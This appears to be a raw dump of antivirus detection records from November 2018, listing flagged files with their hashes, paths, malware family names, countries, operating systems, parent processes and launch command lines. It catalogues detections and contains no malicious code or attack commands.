  Row(detection=Row(filename='aa27df03a91ef3274511dd97dabffd12c041cebe7eeea4d4132bbfe7cda92a4d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AA27DF03A91EF3274511DD97DABFFD12C041CEBE7EEEA4D4132BBFE7CDA92A4D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa27df03a91ef3274511dd97dabffd12c041cebe7eeea4d4132bbfe7cda92a4d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:47:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='E:\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcd73457116984953123e8b52cafeed9590b7abee1e72e4e9bad0a6d601c0e66', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:r4btJN+yC0u9FXCE.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:28:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:47:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='D:\\Tools\\wintool\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:34:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Programas para la computadora\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='9cb0e22617f388ab8df14bedef5c074be57a6be6dde068fbae1b382e23eb8b02', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-02T11:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00006d1f', filepath='C:\\WINDOWS\\Temp\\bae994b3-6347-4072-9a99-ed1083c9947c\\tmp0000018d\\tmp00006d1f', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='8460c459ddd42fe462f0da14f356f3ce609a5dfdcef29944cc0f39ff2a917462', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T16:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001130-f73fd2fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_437e8a98\\AVSCAN-20181103-001117-F498F9CD\\AVSCAN-20181103-001130-F73FD2FE', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rise of the tomb raider - installshield wizard.exe', filepath='C:\\Users\\X\\Downloads\\Rise of the Tomb Raider - InstallShield Wizard.exe', filesize=15232000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='b2c3f852e43ff4ddc1cf2eb945f06c846acb6fcf0adb9b44f8125635c7397dc3', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kibitzing.vir', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kibitzing.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:55:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fmjhl.exe', filepath='c:\\users\\X\\appdata\\roaming\\fmjhl.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cardrecovery.exe', filepath='K:\\HBCD\\Programs\\CARDRECOVERY.EXE', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-02T08:48:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DigitalRescue4Premium.exe", filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151500-8d7d18e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151010-6BE62586\\AVSCAN-20181102-151500-8D7D18E0', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e9f943a36c4f6983213d3186079cade2d2be6c0dbec9d15b6e201dd822c31efa', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\E9F943A36C4F6983213D3186079CADE2D2BE6C0DBEC9D15B6E201DD822C31EFA', filesize=212000, name='TR/ATRAPS.Gen.#M300.#R5222'), hash='e9f943a36c4f6983213d3186079cade2d2be6c0dbec9d15b6e201dd822c31efa', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zoptzhap.exe', filepath='c:\\users\\X\\appdata\\roaming\\zoptzhap.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8FE8E6C2E3049B61A5DCEC440D458B7A20BF0FAD78258EC6ACA728F3735EC365', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synhel~1.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\5AE256~1\\SYNHEL~1.EXE', filesize=2496000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='fcd8a7c191ad93cfd047a8a2f6dceca9e0a3bac7ad803f5e3318ca7a82790366', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_16431ec4.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_16431ec4.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='600537.html', filepath='\\\\?\\C:\\Program Files (x86)\\Britannica17.0\\Britannica Ultimate Knowledge Pack\\html\\eb_2007_browse\\year_in_review\\600537.html', filesize=4000, name='JS/Redir.NT.638.#M1.#R1'), hash='cf87743ab9d9e882e08fd4b37e5aa3dd57e4b07b750a80c7647462738038f7f1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='G:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\bk2br2nb2yx\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:30:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3139511224-2381403859-274640115-1002\\$RRM956E\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:02:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042150-56c8eac1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-042150-56C8EAC1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:25:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-070109-b01fdef0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_505ccb7e\\AVSCAN-20181102-065948-A6B81FA2\\AVSCAN-20181102-070109-B01FDEF0', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201105-f5e7fe6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae9b6c3c\\AVSCAN-20181102-200924-E5E51EDF\\AVSCAN-20181102-201105-F5E7FE6B', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ag64.dll', filepath='C:\\Program Files (x86)\\SearchesToYesbnd\\_ALLOWDEL_271da\\Ag64.dll', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=None, timestamp='2018-11-02T19:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102025-a26ab284', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102025-A26AB284', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsqB413.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T11:55:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E71059717CA4CC753171E672E9CAD09F48398F8F71A4F5142A481B829659AF9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-210027-5c5f0fd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210027-5C5F0FD9', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:33:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T02:12:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029747c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029747c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:44:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291ae0', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291ae0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:57:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\MSOCache\\All Users\\{90120000-006E-040C-0000-0000000FF1CE}-C\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='f2ffd5f8b1f5bf94dc56f3115a2ed5baf5e7afc428038b42b15e44c09d7ae3d3', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~1\\\\\\\\McAfee\\\\\\\\TrueKey\\\\\\\\MCEC1D~1.EXE\\\\\\" TaskUpdMgr', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T22:59:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133751-eb57c69c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-133708-E5EA1B84\\AVSCAN-20181104-133751-EB57C69C', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M300.#R100957'), hash='c5a6e66d84bf05ad574d2906fba114f0a0cff57c98b8098c93f7bd1e1536dcf1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:37:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151127-0b430c08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151127-0B430C08', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ef69213b2d755d59d820a3c7c539266025891cfb66702206d50067e0ba4723d6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EF69213B2D755D59D820A3C7C539266025891CFB66702206D50067E0BA4723D6', filesize=768000, name='HEUR/AGEN.1024045.#M1.#R1'), hash='ef69213b2d755d59d820a3c7c539266025891cfb66702206d50067e0ba4723d6', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:43:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfCF0D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202059-b32f87d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202059-B32F87D9', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) USB 3.0 eXtensible Host Controller Driver\\uninstall\\Setup.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='e96a3dbfe25fa34212001fe9627835ddbfa56f19de26ac71e0be29fc9a19deb2', metadata=Row(cmdline='--engine=2 --session-id=Z50pq\\\\\\/aCxZzcZzenMcRHh+ZGMxUiZiC00dhPtnzu --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=13581432, timestamp='2018-11-04T12:27:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsd9784.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T17:58:54Z'), dt=datetime.date(2018, 11, 4)),
